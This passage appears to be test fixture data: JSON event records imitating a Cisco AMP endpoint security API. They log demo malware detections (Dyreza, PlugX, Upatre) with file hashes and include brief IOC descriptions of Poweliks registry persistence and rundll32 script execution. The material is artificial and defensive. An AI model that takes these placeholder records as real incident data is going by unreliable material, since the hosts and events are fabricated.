Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256842453221429","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256790913614000,"timestamp":1610705324,"timestamp_nanoseconds":631000000,"date":"2021-01-15T10:08:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256790913613876","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256739374006000,"timestamp":1610705312,"timestamp_nanoseconds":619000000,"date":"2021-01-15T10:08:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256739374006323","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256687834399000,"timestamp":1610705300,"timestamp_nanoseconds":981000000,"date":"2021-01-15T10:08:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256687834398770","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256636294791000,"timestamp":1610705288,"timestamp_nanoseconds":969000000,"date":"2021-01-15T10:08:08+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256636294791217","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666347035918000,"timestamp":1610705286,"timestamp_nanoseconds":699000000,"date":"2021-01-15T10:08:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666347035918339","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666347035918000,"timestamp":1610705286,"timestamp_nanoseconds":559000000,"date":"2021-01-15T10:08:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666347035918338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1521237739226271700,"timestamp":1610705284,"timestamp_nanoseconds":226259000,"date":"2021-01-15T10:08:04+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610705284,"start_date":"2021-01-15T10:08:04+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Poweliks is a fileless click-fraud malware variant which resides within the registry. It maintains persistence by creating a registry key that makes use of rundll32 to execute javascript code to read Powershell from the Windows registry, which subsequently executes portable executable code in memory.","short_description":"W32.PoweliksPersistence.ioc"},"file":{"disposition":"Clean","file_name":"rundll32.exe","file_path":"/C:/Windows/system32/rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1521237739190653000,"timestamp":1610705284,"timestamp_nanoseconds":190644000,"date":"2021-01-15T10:08:04+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705284,"start_date":"2021-01-15T10:08:04+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The rundll32 application is designed to run code present in DLLs. There is however a case where it can also be used in the same way as MSHTA to execute JavaScript code on the command-line.","short_description":"W32.rundll32RunHTMLApplication.ioc"},"file":{"disposition":"Clean","file_name":"rundll32.exe","file_path":"/C:/Windows/system32/rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666334151016000,"timestamp":1610705283,"timestamp_nanoseconds":977000000,"date":"2021-01-15T10:08:03+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.B1380FD95B-100.SBX.TG","detection_id":"6533666334151016449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"},"parent":{"process_id":3180,"disposition":"Clean","file_name":"rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124","sha1":"8939cf35447b22dd2c6e6f443446acc1bf986d58","md5":"51138beea3e2c21ec44d0932c71762a8"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256584755184000,"timestamp":1610705276,"timestamp_nanoseconds":957000000,"date":"2021-01-15T10:07:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256584755183664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709202491408000,"timestamp":1610705270,"timestamp_nanoseconds":802000000,"date":"2021-01-15T10:07:50+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209764771561000,"timestamp":1610705269,"timestamp_nanoseconds":265000000,"date":"2021-01-15T10:07:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209764771561497","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256537510543000,"timestamp":1610705265,"timestamp_nanoseconds":319000000,"date":"2021-01-15T10:07:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256537510543407","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":187000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841155","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55722,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":171000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841158","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55725,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":171000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841157","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55724,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":171000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841156","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55723,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":171000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841154","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55721,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":47000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333324762873857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55720,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155907656771961000,"timestamp":1610705263,"timestamp_nanoseconds":912000000,"date":"2021-01-15T10:07:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155907656771960835","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"McUtil.DLL","file_path":"\\\\?\\C:\\Documents and Settings\\All Users\\VirusMap\\McUtil.DLL","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48","sha1":"ae0f9bf2740d00c5d485827eb32aca33feaa3a90","md5":"ad4a646b38a482cc07d5b09b4fffd3b3"},"parent":{"process_id":1428,"disposition":"Clean","file_name":"mcvsmap.exe","identity":{"sha256":"ae16e10e621d6610a3f7f2c7122f9d1263700ba02d1b90e42798decb2fe84096","sha1":"9224de3af2a246011c6294f64f27206d165317ba","md5":"4e1e0b8b0673937415599bf2f24c44ad"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155907656771961000,"timestamp":1610705263,"timestamp_nanoseconds":162000000,"date":"2021-01-15T10:07:43+00:00","event_type":"Threat 